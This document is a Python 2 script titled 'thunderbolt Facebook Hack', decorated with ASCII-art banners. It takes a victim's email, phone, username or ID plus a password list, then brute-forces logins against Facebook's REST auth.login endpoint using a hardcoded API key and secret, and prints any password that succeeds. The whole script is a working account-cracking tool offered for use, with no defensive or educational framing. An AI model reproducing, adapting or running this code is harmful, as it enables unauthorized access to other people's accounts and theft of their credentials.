## thunderbolt Hack facebook
# -*- coding: utf-8 -Hack Facebook
##
import time
import os
import sys
import urllib
import hashlib
os.system ("clear")
API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32"
__banner__= """\033[1;32m

Envoyer par email Michael
          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'   DIE    `98v8P'  HUMAN   `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '

\033[1;33m
_____              _                 _      ____
|  ___|_ _  ___ ___| |__   ___   ___ | | __ |  _ \  __ _ _ __   __ _  ___ _ __
| |_ / _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | | | |/ _` | '_ \ / _` |/ _ \ '__|
|  _| (_| | (_|  __/ |_) | (_) | (_) |   <  | |_| | (_| | | | | (_| |  __/ |
|_|  \__,_|\___\___|_.__/ \___/ \___/|_|\_\ |____/ \__,_|_| |_|\__, |\___|_|
                                                               |___/
	"""
def banner () :
	os.system ("clear")
	print ("-"*100)
	print ("\033[1;32m")
	print ("Envoyer par facebook Michael Melad					")
	print ("	                               /T /I					")
	print ("	                              / |/ | .-~/				")
	print ("	                          T\ Y  I  |/  /  _				")
	print ("	         /T               | \I  |  I  Y.-~/				")
	print ("	        I l   /I       T\ |  |  l  |  T  /				")
	print ("	     T\ |  \ Y l  /T   | \I  l   \ `  l Y				")
	print ("	__  | \l   \l  \I l __l  l   \   `  _. |				")
	print ("	 \ ~-l  `\   `\  \  \ ~\  \   `. .-~   |				")
	print ("	  \   ~-. *-.  `  \  ^._ ^. *-.  /  \   |				")
	print ("	.--~-._  ~-  `  _  ~-_.--'.' ._ /._ .\ ./				")
	print ("	 >--.  ~-.   ._  ~>-'    ' \  7   7   ]					")
	print ("	^.___~'--._    ~-{  .-~ .  `\ Y . /    |				")
	print ("	 <__ ~'-.  ~       /_/   \   \I  Y   : |				")
	print ("	   ^-.__           ~(_/   \   >._:   | l______				")
	print ("	       ^--.,___.-~*  /_/   !  `-.~*--l_ /     ~*-.			")
	print ("	              (_/ .  ~(   /'     '~'-,Y   -=b-. _)			")
	print ("	               (_/ .  \  :           / l      c*~o \			")
	print ("	                \ /    `.    .     .^   \_.-~'~--.  )			")
	print ("	                 (_/ .   `  /     /       !       )/			")
	print ("	                  / / _.   '.   .':      /        '			")
	print ("	                  ~(_/ .   /    _  `  .-<_				")
	print ("	                    /_/ . ' .-~* `.  / \  \          ,z=.		")
	print ("	                    ~( /   '  :   | K   *.~-.______/			")
	print ("	                      '-,.    l   I/ \_    __{--->._(==.		")
	print ("	                       //(     \  <    ~'~'     //			")
	print ("	                     /' /\     \  \     ,v=.  ((			")
	print ("	                    .^. / /\     '  }__ //===-  `			")
	print ("	                   / / ' '  '-.,__ {---(==-				")
	print ("	                 .^ '       :  T  ~'   ll       -Row			")
	print ("	                / .  .  . : | :!        \				")
	print ("	               (_/  /   | | j-          ~^				")
	print ("	                 ~-<_(_.^-~						")
	print ("\033[1;36m-"*100)
	print ("      ")

print("\033[1;31m[+] thunderbolt Facebook Hack [+] \n")
print (__banner__)
userid = raw_input("\033[1;32m[+] Enter \033[1;31m[Email \033[1;33m[Phone] \033[1;34m[Username] \033[1;35m[ID] \033[1;31m<××> \033[1;32m")
try:
	passlist = raw_input("\033[1;36m[*] Enter Passlist ")
	if os.path.exists(passlist) != False:
		banner ()
		print(" \033[1;31m[+] Account : \033[1;33m{}".format(userid))
		print(" \033[1;35m[+] Loaded : \033[1;33m{}".format(len(open(passlist,"r").read().split("\n"))))
		print(" \033[1;34m[+] password attak \033[1;35mplease wait ...")
		for passwd in open(passlist,'r').readlines():
			sys.stdout.write(u"\u001b[1000D\033[1;33m[*] guess the passwords \033[1;31m>\033[1;33m>\033[1;35m>\033[1;36m>  \033[1;32m{}".format(passwd.strip()))
			sys.stdout.flush()
			sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET)
			xx = hashlib.md5(sig).hexdigest()
			data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx)
			response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read()
			if "error" in response:
				pass
			else:
				print("\n\n[+] Password Found .. !!")
				print("\n[+] Password : {}".format(passwd.strip()))
				break
		print("\n\n[!] Done .. !!")
	else:
		print("thunderbolt: Erorr.. No Such File or Directory")
except KeyboardInterrupt:
	print("thunderbolt: Erorr.. Keyboard Interrupt")
